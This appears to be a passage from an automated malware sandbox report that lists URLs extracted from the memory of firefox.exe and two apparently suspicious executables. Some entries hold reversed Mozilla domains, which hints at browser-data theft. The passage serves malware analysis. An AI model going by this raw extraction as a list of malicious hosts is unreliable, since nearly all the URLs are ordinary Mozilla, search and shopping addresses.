                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881Somehow
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: firefox.exe, 0000002B.00000002.3259915255.0000023770C33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submitNumber
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C543000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submits
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://json-schema.org/draft/2019-09/schema
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
                      Source: firefox.exe, 0000002B.00000002.3167049287.0000023763E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com
                      Source: firefox.exe, 0000002B.00000002.3215012114.0000023769158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%extensions.formautofill.credit
                      Source: firefox.exe, 0000002B.00000002.3223958305.00000237698F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3267074024.000008519BB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.comchrome://global/content/elements/moz-button-group.css
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.comchrome://browser/content/browser-siteIdentity.js
                      Source: firefox.exe, 0000002B.00000002.3182323592.0000023765BAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3185470881.0000023765C21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://outlook.live.com/default.aspx?rru=compose&
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sresource://gre/modules/DeferredTask.sys.mjs
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.inbox
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sresource://gre/modules/JSONFile.sys.mjsresource://gre/modules
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest5
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest_createPermissionClearButton/
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.comshowBadgeOnlyNotificationpictureinpicture.toggle_enabledError:
                      Source: firefox.exe, 0000002B.00000002.3267798545.0000160E4E004000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org/
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://mozilla.org/W
                      Source: 8eeb449c35.exe, 00000019.00000003.2895853404.0000000005315000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2897117382.0000000005304000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2896993174.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3073543559.0000000005A7E000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3076025417.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3081033783.0000000005A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.comXID/
                      Source: 8eeb449c35.exe, 00000019.00000003.2895853404.0000000005315000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2897117382.0000000005304000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2896993174.0000000005301000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3073543559.0000000005A7E000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3076025417.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3081033783.0000000005A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.comXIDv10
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mzl.la/3NS9KJd
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ok.ru/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sextractScheme/fixupChangedProtocol
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.combrowser.launched_to_handle/backgroundtasks/BackgroundTask_:
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/FORCE_PRIVATE_BROWSING_WINDOW
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/FORCE_PRIVATE_BROWSING_WINDOWresource://default-theme/wikipedia
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/persist/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.comremoveTabsProgressListenertestPermissionFromPrincipalaccount-connecti
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_ke
                      Source: firefox.exe, 0000002B.00000002.3254494397.000002376C82C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#l
                      Source: firefox.exe, 0000002B.00000002.3259915255.0000023770C33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000003.3132532743.000002376C543000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/userAS_ROUTER_TELEMETRY_USER_EVENT
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/userAS_ROUTER_TELEMETRY_USER_EVENTDISCOVERY_STREAM_FEED_UPDATEDISCOVERY_
                      Source: firefox.exe, 0000002B.00000002.3222383416.000002376930C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3220663743.00000237692A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsresource://gre/modules/TelemetryReportingPolicy.sys
                      Source: firefox.exe, 0000002B.00000002.3222383416.000002376930C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3220663743.000002376927E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3220663743.00000237692A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelCannot
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                      Source: firefox.exe, 0000002B.00000002.3236380507.000002376AEB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                      Source: 8eeb449c35.exe, 00000021.00000003.3133877268.0000000005D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helphttps://support.mozi
                      Source: firefox.exe, 0000002B.00000002.3227392661.0000023769AA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesresource://devtools/client/
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translation
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/PrivateBrowsingUtils.sys.mj
                      Source: 8eeb449c35.exe, 00000021.00000003.3133877268.0000000005D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                      Source: file.exe, 00000000.00000003.2539407143.0000000023D4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.orgmedia.autoplay.blocking_policyContentPermissionIntegrationshouldCheckDefa
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.comchrome://browser/skin/menu.svg
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268067490.0000195926A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
                      Source: firefox.exe, 0000002B.00000003.3080810529.000002376C723000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
                      Source: file.exe, 00000000.00000002.2614337983.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2924556550.000000000530C000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2924865239.000000000530C000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3141958097.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/moz-extension://9eeed604-9883-4846-a688-8a355e52e
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: firefox.exe, 0000002B.00000002.3254494397.000002376C82C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: firefox.exe, 0000002B.00000002.3254494397.000002376C82C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                      Source: file.exe, 00000000.00000003.2376992421.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2893523952.0000000005340000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2892901426.00000000053A3000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2870375772.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869400948.000000000534D000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000019.00000003.2869887499.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3067382245.0000000005AA8000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3034322684.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3063514988.0000000005AB0000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3033802817.0000000005A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: https://www.google.com/policies/privacy/2
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/policies/privacy/BoostrapScope
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3173803252.0000023764C03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/searchinitializeAttributeInheritance
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
                      Source: firefox.exe, 0000002B.00000002.3173803252.0000023764CDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
                      Source: 8eeb449c35.exe, 00000019.00000003.2911532267.000000000554A000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3125540433.0000000005B6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                      Source: 8eeb449c35.exe, 00000019.00000003.2911532267.000000000554A000.00000004.00000800.00020000.00000000.sdmp, 8eeb449c35.exe, 00000021.00000003.3125540433.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3268410463.000023F90CF04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                      Source: 8eeb449c35.exe, 00000021.00000003.3133877268.0000000005D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                      Source: 8eeb449c35.exe, 00000021.00000003.3133877268.0000000005D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                      Source: 8eeb449c35.exe, 00000021.00000003.3133877268.0000000005D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: firefox.exe, 0000002B.00000002.3176419611.0000023764F00000.00000002.00000001.00040000.00000022.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/new/
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/new/delete-browsing-search-download-history-firefoxresource://gre/mo
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
                      Source: firefox.exe, 0000002B.00000003.3124478396.000002376C833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/V
                      Source: firefox.exe, 0000002B.00000002.3222383416.0000023769317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002B.00000002.3267074024.000008519BB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                      Source: firefox.exe, 0000002B.00000003.3132532743.000002376C51F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
